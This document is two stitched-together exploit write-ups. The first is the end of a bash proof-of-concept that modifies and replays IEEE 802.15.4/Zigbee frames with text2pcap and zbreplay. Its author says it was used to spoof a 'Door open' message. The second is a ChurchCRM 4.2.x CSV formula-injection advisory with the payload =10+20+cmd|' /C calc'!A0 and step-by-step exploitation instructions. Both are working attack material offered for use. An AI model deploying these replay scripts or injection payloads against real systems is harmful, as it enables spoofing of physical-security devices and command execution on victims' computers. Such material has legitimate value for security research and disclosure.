first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2} echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump elif [[ "$line" == "0010"* ]]; then IFS=' ' read -ra second_line_array <<< "$line" second_line_array[0]+=" " second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2} second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2} second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2} second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2} echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump elif [[ "$line" == "0030"* ]]; then IFS=' ' read -ra last_line_array <<< "$line" last_line_array[0]+=" " last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2} last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2} echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump else echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump fi done < $HEX_DUMP_FILE # Hex Dump file to pcap text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap # Playback zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n" } function main(){ if [ $# -lt 8 ]; then echo -e "\n\t Missing arguments" usage exit else message poc_playback $1 $2 $3 $4 $5 $6 $7 $8 fi } main $1 $2 $3 $4 $5 $6 $7 $8 #NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".

#Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection #Date: 2020- 10- 24 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://churchcrm.io/ #Software Link: https://github.com/ChurchCRM/CRM #Version: 4.2.0 #Payload: =10+20+cmd|' /C calc'!A0 #Tested on: Kali Linux 2020.3 #Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Login to the application, goto 'Events' module and then "List Event Types" 2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field 3. Now goto 'List Event types' module and click CSV to download the CSV file 4. Open the CSV file, allow all popups and our payload is executed (calculator is opened).